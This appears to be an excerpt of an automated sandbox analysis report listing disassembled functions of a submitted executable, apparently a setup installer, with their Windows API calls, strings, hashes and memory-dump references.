API ID: C1500C1520C1540
String ID: j]I
API String ID: 1315064709-3121892809
Opcode ID: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
Instruction ID: e7f530414bf3085e4d7cfc705c611aa1b86d7afe628513c8e1250cb14c5cad09
Opcode Fuzzy Hash: feaa874d4706b8b7378d3c7f6f814d50297004458d497914ea43456c44929d75
Instruction Fuzzy Hash: 55219575A00148AFDB02DAA98C41EBFB7FCEB49301F5544BAF800E3352D6799E04C765

Function 00451E48 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451E9C
GetLastError.KERNEL32(00000000,00000000,?,?,ptE,00000000,XtE,?,?,?,00000000,00451EC2,?,?,?,00000001), ref: 00451EA4

Strings

ptE, xrefs: 00451E8E, 00451E91
XtE, xrefs: 00451E86, 00451E89

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: XtE$ptE
API String ID: 2919029540-3149052308
Opcode ID: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
Instruction ID: bb22cfe1c69965ebf33bde6510f4e9c12d20d0a7e3b249448cdfa000a7835eae
Opcode Fuzzy Hash: 1b22475bc195aebbe59d0d605ebff1622b20c8b4f61711a5e7a983c5d026b08a
Instruction Fuzzy Hash: CB117972600248AF8B00CEA9DC41EEFB7ECEB4C315B50456ABD08E3211D638AD148B64

Function 0042EBAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39

Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C

Strings

SHAutoComplete, xrefs: 0042EC16
shlwapi.dll, xrefs: 0042EBE7

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
String ID: SHAutoComplete$shlwapi.dll
API String ID: 395431579-1506664499
Opcode ID: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
Instruction ID: 0a6e4b60a995cf3844b8ce041fcdcfda7059b8caa19e1ea1d7c6064077637db5
Opcode Fuzzy Hash: af1ff3558c849783ae7628f29ef05ab001590ae3fde48b9577f20a486df8663c
Instruction Fuzzy Hash: DF115130B00618ABDB11EBA3EC46B9E7BACDB55704F904477F440A6291DB7C9E05865D

Function 00454F2C Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60

RegCloseKey.ADVAPI32(?,00454F97,?,00000001,00000000), ref: 00454F8A

Strings

SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454F38
PendingFileRenameOperations, xrefs: 00454F5C
PendingFileRenameOperations2, xrefs: 00454F6B

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseOpen
String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
API String ID: 47109696-2115312317
Opcode ID: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
Instruction ID: 62424a60a083e79a6b05d0fdb6a44897ff41ae01fc8b0970a663cd5cbe246870
Opcode Fuzzy Hash: 5dcac94d697b885c683a227898f374571a92b3b291de96d5a97cdf80d35f52cc
Instruction Fuzzy Hash: 38F06232704308AFDB05D6E9EC13E1B77EDD7C471DFA04466F800DA582DA79AD54951C

Function 00471114 Relevance: 6.3, APIs: 4, Instructions: 263fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,00000000,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004712C1
FindClose.KERNEL32(000000FF,004712EC,004712E5,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 004712DF
FindNextFileA.KERNEL32(000000FF,?,00000000,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681), ref: 004713E3
FindClose.KERNEL32(000000FF,0047140E,00471407,?,00000000,?,0049B178,00000000,004714B3,?,00000000,?,00000000,?,00471681,?), ref: 00471401

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
Instruction ID: fd5baf34d75b45a9c5a92b54ca89d945eeead41d823e22f141a566db3cd00da7
Opcode Fuzzy Hash: 5aad9e81f7e5fa55e1859ea29c33747ca9dc34a1e4eb662fcbe9c9568599dcde
Instruction Fuzzy Hash: D6B10E7490424D9FCF11DFA9C881ADEBBB9FF49304F5085A6E808B7261D7389A46CF54

Function 0047E350 Relevance: 6.1, APIs: 4, Instructions: 147fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?,00000000), ref: 0047E3F6
FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?,?), ref: 0047E403
FindNextFileA.KERNEL32(000000FF,?,00000000,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766), ref: 0047E4F8
FindClose.KERNEL32(000000FF,0047E523,0047E51C,?,?,?,?,00000000,0047E549,?,00000000,00000000,?,?,0047F766,?), ref: 0047E516

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Find$CloseFileNext
String ID:
API String ID: 2066263336-0
Opcode ID: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
Instruction ID: d9f5877477ad4919a51ea01a6ce133d6d52d68eb085124448875bfa655ef3505
Opcode Fuzzy Hash: 0b899193b38ae4b4a9f711b903f30aca3397319e452da35565708c6391061ac6
Instruction Fuzzy Hash: 05514071900649EFCB11DFA6CC45ADEB7B8EB48319F1085EAA808E7351E6389F45CF54

Function 00421284 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 00421371
SetMenu.USER32(00000000,00000000), ref: 0042138E
SetMenu.USER32(00000000,00000000), ref: 004213C3
SetMenu.USER32(00000000,00000000), ref: 004213DF

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Menu
String ID:
API String ID: 3711407533-0
Opcode ID: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction ID: d5697da4fc95676b4ee4b3549606d87e5ebc590dd77dbca5d1b8da67126da037
Opcode Fuzzy Hash: 34f2614583af254fd8d6d369479d0ea33ac466a7734d692b5325538cfe721683
Instruction Fuzzy Hash: D041A13070025447EB20EA79A88579B26965F69318F4805BFFC44DF3A3CA7DCC45839D

Function 00416B52 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,?,?,?), ref: 00416B94
SetTextColor.GDI32(?,00000000), ref: 00416BAE
SetBkColor.GDI32(?,00000000), ref: 00416BC8
CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BF0

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Color$CallMessageProcSendTextWindow
String ID:
API String ID: 601730667-0
Opcode ID: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
Instruction ID: 7a78515b3e46194db8101330e18da160614de8b80347fcfd5663145ee8fb6c7e
Opcode Fuzzy Hash: c8424e95f6d781db4325e6c83d9f419e4623fd2ec4a9fd1ab852655791a28026
Instruction Fuzzy Hash: 27115EB6600A04AFC710EE6ECC84E8773ECDF48314715883EB59ADB612D638F8418B69

Function 00454498 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

WaitForInputIdle.USER32(?,00000032), ref: 004544C4
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
String ID:
API String ID: 4071923889-0
Opcode ID: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
Instruction ID: 9fcdfe959295c415b2919edefc4bc283a9fb09ec36d5bd5c2e1fe4b9dd3ee853
Opcode Fuzzy Hash: 92cad1b1623a520deb2a60ceab2f66088d33f5f9fd8daf829ec97aba04c0730e
Instruction Fuzzy Hash: D601B9706406087EEB2097A58C06F6B7BACDB85778F510567FA04DB2C2D9B89D408668

Function 004230D8 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

73E9A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
73EA4620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
73E9A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A4620A480A570EnumFonts
String ID:
API String ID: 178811091-0
Opcode ID: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction ID: 16e9332b6476af0d686f12fa818e5571f82757a24bc5219822a197079b30e1ec
Opcode Fuzzy Hash: 1e77baaa554069656ebb7f1896433780fe2d8d07f1dc07fb2a8b7fd44a0a16f2
Instruction Fuzzy Hash: D80192717447106AE710BF7A5C86B9B36649F04719F40427BF804AF2C7D6BE9C05476E

Function 0045B984 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93

FlushFileBuffers.KERNEL32(?), ref: 0045BBB9

Strings

NumRecs range exceeded, xrefs: 0045BAB6
EndOffset range exceeded, xrefs: 0045BAED

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: File$BuffersFlush
String ID: EndOffset range exceeded$NumRecs range exceeded
API String ID: 3593489403-659731555
Opcode ID: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
Instruction ID: f2711acf26be03df24c87a4523f52de689b41dfdc4f1b15506e6aedc90e5aeb3
Opcode Fuzzy Hash: 3ef1d8ef2fe27ab35db507c607b793a342be7aaea3f0012d498e32cd40a9735a
Instruction Fuzzy Hash: 4761B734A002588BDB25DF15C881ADAB3B5EF49305F0084EAED899B352D7B4AEC8CF54

Function 0049706C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON

Download Yara Rule

APIs

Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049707A), ref: 0040334B
Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049707A), ref: 00403356

Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497084), ref: 0040633A
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497084), ref: 0040637E

Part of subcall function 00409B88: 6F9C1CD0.COMCTL32(0049708E), ref: 00409B88

Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2

Part of subcall function 00419050: GetVersion.KERNEL32(004970A2), ref: 00419050

Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9

Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004970BB), ref: 0044F44F

Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
Part of subcall function 00452850: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
Part of subcall function 00452850: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890

Part of subcall function 004562AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0

Part of subcall function 00463D1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004970D9), ref: 00463D2B
Part of subcall function 00463D1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463D31

Part of subcall function 0046BE24: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BE39

Part of subcall function 004776C8: GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
Part of subcall function 004776C8: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB

Part of subcall function 00494014: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0049402D

SetErrorMode.KERNEL32(00000001,00000000,0049712B), ref: 004970FD

Part of subcall function 00496E2C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00497107,00000001,00000000,0049712B), ref: 00496E36
Part of subcall function 00496E2C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00496E3C

Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503

Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC

ShowWindow.USER32(?,00000005,00000000,0049712B), ref: 0049715E

Part of subcall function 00480B7C: SetActiveWindow.USER32(?), ref: 00480C2A

Strings

Setup, xrefs: 00497144

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
String ID: Setup
API String ID: 504348408-3839654196
Opcode ID: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
Instruction ID: ebb0a401c3e664f155299204c0f5f4603c455a0fe39dfd081332d01f58350741
Opcode Fuzzy Hash: 980f61c249789edf80bef623c70ffd76524896e35817f2e47642f40ae8962751
Instruction Fuzzy Hash: CE31B4312186409FDA11BBB7ED1391D3BA4EB8971C7A2447FF90482663DE3D58508A6E

Function 0041EEB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0041EF03
73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

Strings

RzE, xrefs: 0041EF46

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: A5940CurrentThread
String ID: RzE
API String ID: 2589350566-1126107055
Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18

Function 0047B0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B346,00000000,0047B35C,?,?,?,?,00000000), ref: 0047B122

Strings

RegisteredOwner, xrefs: 0047B0FF
RegisteredOrganization, xrefs: 0047B111

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: Close
String ID: RegisteredOrganization$RegisteredOwner
API String ID: 3535843008-1113070880
Opcode ID: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
Instruction ID: c0e5db093c22981a2c4b78a2736f8ddfc80e316131ebabe5fbae1d79ea558dad
Opcode Fuzzy Hash: e77b6468a0bbf668d644fb693f5a97652e08946f06f09772adc7615d771fa624
Instruction Fuzzy Hash: F1F0BB70708284ABEB00D675FD92BDB3359D742344F50807BA5149B391D7B99E01D79C

Function 004741CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 004741F1
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474403), ref: 00474208

Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF

Strings

CreateFile, xrefs: 004741FD

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367246783.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367385971.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367399997.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wG1fFAzGfH.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: CreateFile
API String ID: 2528220319-823142352
Opcode ID: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
Instruction ID: 58c46c97337ee3450255063b4db4f116026cd25e8145783c5652bdd163bde5c5
Opcode Fuzzy Hash: 285fe29be3b45c5d55921f03afc8078dc8cb5333e8f17a8fd5c0d1f978e05295
Instruction Fuzzy Hash: 78E06D342803447FEA10F769DCC6F5A7788AB04768F108152FA58AF3E3C6B9EC408618

Function 004562AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0045623C: CoInitialize.OLE32(00000000), ref: 00456242

Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004562D0

Strings

SHCreateItemFromParsingName, xrefs: 004562BB
shell32.dll, xrefs: 004562C5

Memory Dump Source

Source File: 00000001.00000002.3367160249.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3367138515.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3367224601.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
